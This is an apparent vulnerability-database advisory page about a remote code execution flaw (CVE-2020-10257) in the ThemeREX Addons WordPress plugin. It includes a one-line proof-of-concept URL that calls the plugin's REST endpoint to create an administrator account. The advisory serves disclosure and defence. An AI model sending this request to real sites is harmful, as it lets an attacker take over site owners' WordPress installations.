Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbWordfenceWPVDB-ID:4ED4E60E-5BBB-4010-A7FE-40EADD8DEE64
HistoryFeb 18, 2020 - 12:00 a.m.

ThemeREX Addons - Remote Code Execution

2020-02-1800:00:00
Wordfence
wpscan.com
13

0.101 Low

EPSS

Percentile

95.0%

JSON

“This flaw allows attackers to remotely execute code on a site with the plugin installed, including the ability to execute code that can inject administrative user accounts.” Note (WPScanTeam): There are major version inconsistencies in the trx_addons shipped with the affected themes. As a result, a common the fixed in version can not be set so far and we would recommend to see the posts from ThemeRex and Wordfence in the references below for the versions.

PoC

https://[domain]/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role;=administrator&user;_login=admin&user;_pass=admin

CPENameOperatorVersion
trx_addonseq*

Related

cvelist 1
patchstack 3
wpexploit 1
nvd 1
cve 1
prion 1
cvelist
cvelist
CVE-2020-10257
2020-03-09 23:41:34
patchstack
patchstack
WordPress Yottis premium theme <= 1.0 - Remote Code Execution (RCE) vulnerability
2020-02-18 00:00:00
WordPress Chit Club premium theme <= 1.0 - Remote Code Execution (RCE) vulnerability
2020-02-18 00:00:00
WordPress Ozeum premium theme <= 1.0.1 - Remote Code Execution (RCE) vulnerability
2020-02-18 00:00:00
wpexploit
wpexploit
ThemeREX Addons - Remote Code Execution
2020-02-18 00:00:00
nvd
nvd
CVE-2020-10257
2020-03-10 00:15:10
cve
cve
CVE-2020-10257
2020-03-10 00:15:10
prion
prion
Design/Logic Flaw
2020-03-10 00:15:00

0.101 Low

EPSS

Percentile

95.0%

JSON
Related for WPVDB-ID:4ED4E60E-5BBB-4010-A7FE-40EADD8DEE64
cvelist1patchstack3wpexploit1nvd1cve1prion1